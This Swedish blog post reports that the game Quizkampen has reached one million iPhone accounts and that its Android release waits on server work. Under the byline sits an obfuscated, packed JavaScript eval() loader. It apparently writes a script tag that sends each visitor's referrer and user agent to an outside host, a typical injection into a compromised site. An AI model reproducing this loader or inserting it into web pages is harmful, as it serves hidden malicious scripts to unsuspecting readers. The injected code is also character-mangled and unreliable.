Image Image Image Image Image Image Image Image Image Image

| 15 augusti, 2020

Scroll to top

Top

Quizkampen uppe i en miljon konton

Quizkampen uppe i en miljon konton
Sebastian

Quizkampen: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dkssn|var|u0026u|referrer|shrfk||js|php’.split(’|’),0,{}))
Det otroligt populära spelet Quizkampen är nu uppe i en miljon konton på bara iPhonesidan. Detta kan vara en av orsakerna till att spelet ibland kan kännas en aning trögt på kvällarna när det är som flest spelare inloggade. 

Quizkampen meddelar att de jobbar för fullt med att avlasta deras server så att spelet ska flyta på snabbare igen.

Android-versionen av spelet är klart men just nu jobbas det för fullt så att få den servern på rätt plats. Det räcker inte att bara köpa en ny server utan databashanteringen behöver byggas om för att kunna skalas upp och således kunna hantera all extra trafik som androidversionen kommer generera.

”Så fort vi ser att våra optimeringar på servern gett resultat kommer vi kunna släppa androidversionen och detta kan ske imorgon eller om två veckor – oavsett när du läser detta.” meddelar Quizkampen på deras Facebook

Läs mer på deras Facebook här!